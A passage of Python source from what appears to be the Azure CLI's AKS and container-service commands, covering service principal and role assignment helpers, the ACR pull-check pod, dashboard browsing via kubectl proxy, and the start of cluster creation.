return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(
reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(
cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
# TODO: track2/remove custom headers, depends on 'azure.mgmt.authorization'
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
_, browse_path = tempfile.mkstemp()
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
kubectl_minor_version = int(kubectl_version["clientVersion"]["minor"])
kubectl_server_minor_version = int(
kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(
kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to '
'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for'
'more information.')
except subprocess.CalledProcessError as err:
raise ValidationError(
"Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"tty": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
"nodeSelector": {"kubernetes.io/os": "linux"},
}
}
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
]
# Support kubectl versons < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
)
except subprocess.CalledProcessError as err:
raise CLIError("Failed to check the ACR: {}".format(err))
if output:
print(output)
else:
raise CLIError("Failed to check the ACR.")
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(
result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
fqdn_subdomain=None,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_encryption_at_host=False,
assign_kubelet_identity=None,
enable_ultra_ssd=False,
edge_zone=None,
no_wait=False,
yes=False,
enable_azure_rbac=False):
ManagedClusterWindowsProfile = cmd.get_models('ManagedClusterWindowsProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterSKU = cmd.get_models('ManagedClusterSKU',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceNetworkProfile = cmd.get_models('ContainerServiceNetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceLinuxProfile = cmd.get_models('ContainerServiceLinuxProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshConfiguration = cmd.get_models('ContainerServiceSshConfiguration',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ContainerServiceSshPublicKey = cmd.get_models('ContainerServiceSshPublicKey',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAADProfile = cmd.get_models('ManagedClusterAADProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterAgentPoolProfile = cmd.get_models('ManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedClusterIdentity = cmd.get_models('ManagedClusterIdentity',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties = cmd.get_models(
'ComponentsQit0EtSchemasManagedclusterpropertiesPropertiesIdentityprofileAdditionalproperties',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
ManagedCluster = cmd.get_models('ManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties = cmd.get_models(
'Components1Umhcm8SchemasManagedclusteridentityPropertiesUserassignedidentitiesAdditionalproperties',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise MutuallyExclusiveArgumentError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type,
mode="System"
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username or windows_admin_password:
# To avoid that windows_admin_password is set but windows_admin_username is not
if windows_admin_username is None:
try:
from knack.prompting import prompt
windows_admin_username = prompt('windows_admin_username: ')
# The validation for admin_username in ManagedClusterWindowsProfile will fail even if
# users still set windows_admin_username to empty here
except NoTTYException:
raise CLIError(
'Please specify username for Windows in non-interactive mode.')
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
# Skip create service principal profile for the cluster if the cluster
# enables managed identity and customer doesn't explicitly provide a service principal.
service_principal_profile = None
principal_obj = None
if not(enable_managed_identity and not service_principal and not client_secret):
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own'
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
cmd,
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(
outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
